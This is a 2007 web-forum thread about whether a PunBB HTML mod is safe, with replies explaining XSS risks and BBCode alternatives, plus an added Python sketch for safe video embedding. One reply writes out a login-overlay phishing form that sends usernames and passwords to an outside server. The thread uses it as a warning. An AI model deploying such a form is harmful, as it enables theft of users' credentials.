Topic: HTML mod - safe ?

Hello,

I'm using PunBB1.2.14 and HTML mod.

Basically, I want the users of my website to add simple HTML code, YouTube videos, linked MP3s and linked images.

I run PunBB as a hidden forum meaning that users will see posts as being part of a user's profile. So if the user screws up his/her HTML, well it's not a problem for me.

From what I can see, allowing HTML within posts is completely safe (apart from the possible screwing up of pages). But is that entirely true?

PS: [youtube]...[/youtube], [google, etc. are already in place but the users of my website just don't understand how to use them. So allowing copy/paste <embed> and <object> is the only solution I can think of.

Re: HTML mod - safe ?

Don't think it's very safe, I could probably write some Javascript that sends all the cookies of the viewing user to my server or so.

Re: HTML mod - safe ?

Plus, arbitrary Flash applets can redirect people as well. HTML can be dangerous.

Re: HTML mod - safe ?

Surely posting the youtube/google video link inside [youtube] tags is much simpler than posting html code?

Re: HTML mod - safe ?

OK. Thanks for your replies.

So, if <script> is NOT allowed, then there should be no security issue? Is that all I should not allow?

Well, as for liquidatOr, the big difference is that users just need to do a cut/paste from YouTube of the <object><embed... to their post. As a techie myself, I thought that the [youtube] solution was quite good, but believe me it is not obvious for MOST people. And when I see what people can do on myspace, I really wonder how they manage.

Re: HTML mod - safe ?

So, if <script> is NOT allowed, then there should be no security issue? Is that all I should not allow?

No, any HTML tag can be manipulated to have javascript in it as an attribute.

Re: HTML mod - safe ?

There always remains a security issue.
I think it'd be better to write some sort of regex to let through the youtube HTML.

Re: HTML mod - safe ?

OK. OK. I see. Here is a warning from the CERT dating from 2000! http://www.cert.org/advisories/CA-2000-02.html

Oh dear. Bye bye customization.

So it means that on myspace, people can do whatever they want since they can include any code they want. I really wonder how this has not led to a major security catastrophe.

I thought I had the key to customizing my users' profiles and posts. Need to think about something else I guess. One user has already done a copy/paste of an <object> from a music website and is complaining that it's not playing.

Re: HTML mod - safe ?

Well, myspace is adding more and more code to prevent malicious HTML. But that also means a huge codebase and way too much overhead.

Maybe something easier would be to provide a form where a youtube/whatever link is converted to BBCode?

Re: HTML mod - safe ?

Don't forget <object>, <applet> and others.

Also, wouldn't it be nice to have

<form action="http://privateserver.com/getpasswords.php">
<input type="text" name="username" style="position:absolute; left: 50px; top:70px;">
<input type="password" name="password" style="position:absolute; left: 50px; top:80px;">
</form>

Someone could put their own form in there, and place the input items overtop your own login input items.

Frankly, if you allow user submitted html anywhere on your site, people could come up with a new way to cause grief every other second.

echo "deadram"; echo; fortune;

Re: HTML mod - safe ?

play75010 wrote:

...
PS: [youtube]...[/youtube], [google, etc. are already in place but the users of my website just don't understand how to use them. So allowing copy/paste <embed> and <object> is the only solution I can think of.

I made a "mod"-javascript solution to this.
My users just write the link to the video and javascript transform to the <object>.
Works with YouTube, Metacafe, Google Video, iFilm, Revver and Bolt.

http://www.punres.org/viewtopic.php?id=3016

sorry for my english
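The two suggestions above (a form or script that turns a pasted video link into BBCode, and a "regex to let through the youtube HTML") both come down to the same rule: accept a URL from the user and let the forum write the <object>/<embed> markup itself, so no user-supplied HTML ever reaches the page. The following is an added example of that rule, not code from PunBB or from the mod linked above; it assumes YouTube watch URLs of the form http://www.youtube.com/watch?v=ID with an 11-character id, and the 2007-era embed markup.

```python
import html
import re
from typing import Optional
from urllib.parse import parse_qs, urlparse

# Assumed shape of a YouTube video id (11 chars of [A-Za-z0-9_-]) and of a watch URL.
VIDEO_ID_RE = re.compile(r"^[A-Za-z0-9_-]{11}$")
YOUTUBE_HOSTS = {"youtube.com", "www.youtube.com"}
BBCODE_RE = re.compile(r"\[youtube\](.*?)\[/youtube\]", re.IGNORECASE | re.DOTALL)


def youtube_id(url: str) -> Optional[str]:
    """Return the video id if url is a plain YouTube watch URL, otherwise None."""
    try:
        parts = urlparse(url.strip())
    except ValueError:
        return None
    if parts.scheme not in ("http", "https"):
        return None
    if parts.hostname not in YOUTUBE_HOSTS or parts.path != "/watch":
        return None
    ids = parse_qs(parts.query).get("v", [])
    # Exactly one id, and only characters the strict pattern allows.
    if len(ids) != 1 or not VIDEO_ID_RE.match(ids[0]):
        return None
    return ids[0]


def embed_markup(video_id: str) -> str:
    """The forum, not the user, writes the <object>/<embed> pair for a validated id."""
    src = "http://www.youtube.com/v/" + video_id
    return ('<object width="425" height="350">'
            f'<param name="movie" value="{src}"></param>'
            f'<embed src="{src}" type="application/x-shockwave-flash" '
            'width="425" height="350"></embed></object>')


def render_post(text: str) -> str:
    """HTML-escape the whole post; only well-formed [youtube]URL[/youtube] tags
    become embeds. Anything else inside the tags is shown as escaped text."""
    out, pos = [], 0
    for m in BBCODE_RE.finditer(text):
        out.append(html.escape(text[pos:m.start()]))
        vid = youtube_id(m.group(1))
        out.append(embed_markup(vid) if vid else html.escape(m.group(0)))
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)
```

Pasted <object> or <embed> markup, a link on another host, or an id with extra characters all fall through to html.escape, so the worst outcome is a visible tag in the post rather than markup in the page.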

12 (edited by MattF 2007-03-30 04:00)

Re: HTML mod - safe ?

Just out of curiosity, without enabling html in posts, how would one go about implementing the use of the quicktime/real mod and lightbox, (not the gallery one), which use the <a href links?

Re: HTML mod - safe ?

http://wiki.punres.org/Add_quicktime_an … deo_bbcode
Quicktime/Real doesn't require the user entering HTML (although the regex doesn't look particularly safe to me, someone could possibly inject things).

I assume that applies to the other mods you mention (you would need to link to them for me to double check)


Re: HTML mod - safe ?

I've just put up the info for the lightbox settings. The basics are the same across them all, (plus punres is down).

Lightbox: http://www.huddletogether.com/projects/lightbox2/

The settings are halfway down the page.

Re: HTML mod - safe ?

A PunBB mod that implemented it would rely on BBCode.


Re: HTML mod - safe ?

Smartys wrote:

A PunBB mod that implemented it would rely on BBCode.

Here's the readme file for the lightbox incorporation into punbb:

http://outgoing.bauchan.org/software/li … readme.txt


It may just be I that's missed the obvious, but I can't see any bbcode tag there. How would one go about incorporating it into the bbcode if so?

Cheers,

Matt

Re: HTML mod - safe ?

It modifies the parsing of the existing img BBCode.

Re: HTML mod - safe ?

If you are going to use or make an HTML mod for your forum, have it only for Admins of course, but better yet, only allowed by Admins in certain forums. In my forum, the admin can post HTML but only on the specific forums that allow this (these being the ones for news/announcements that appear on the homepage etc). Allowing unrestricted use of HTML by a certain group will also make the forum messier and make the divide between admins and regular users bigger.


Re: HTML mod - safe ?

Smartys wrote:

It modifies the parsing of the existing img BBCode.

Talk about giving just enough info to confuse someone even more. Does that mean the url info goes between standard img tags, then?

Re: HTML mod - safe ?

MattF wrote:
Smartys wrote:

It modifies the parsing of the existing img BBCode.

Talk about giving just enough info to confuse someone even more. Does that mean the url info goes between standard img tags, then?

It means exactly what I said.
The output that PunBB creates when using the img BBCode tags is modified to take advantage of the Lightbox script. It doesn't require the user to write any HTML.


Re: HTML mod - safe ?

Smartys wrote:

It means exactly what I said.
The output that PunBB creates when using the img BBCode tags is modified to take advantage of the Lightbox script. It doesn't require the user to write any HTML.

Just checking. It don't work, though. Have just disabled html, put the image url between standard [img] tags, and it just embeds it on the page, as usual.

Re: HTML mod - safe ?

Did you enable img BBCode in your forum?


Re: HTML mod - safe ?

Smartys wrote:

Did you enable img BBCode in your forum?

For a moment I was thinking I might look a right muppet then, but checked and yup, I have.

I've copied and adapted the [url] parsing code, and have managed to get a basic lightbox parser working. I'm going to try and adapt it now to work with Koos' 'Automatic Image Upload' format, the [url][img][img][url] setup to provide the preview thumbnail over the clickable link. Going to try and get the slideshow option in as well. Will post the diffs if I manage to get it all working.

24 (edited by MattF 2007-03-29 23:15)

Re: HTML mod - safe ?

Managed it, (just). Here's the link to the diff: http://outgoing.bauchan.org/software/lb … r.diff.txt

It has the same format as the url tags. The basic [lbox][lbox] format with the url in between the tags, and the [lbox=][img][img][lbox] format which allows it to show a thumbnail pic in the thread and link the larger image to the lightbox script. This one will take all the images from the topic/thread and show them in the slideshow type view. (Not sure if the slideshow function only applies to Lightbox V2).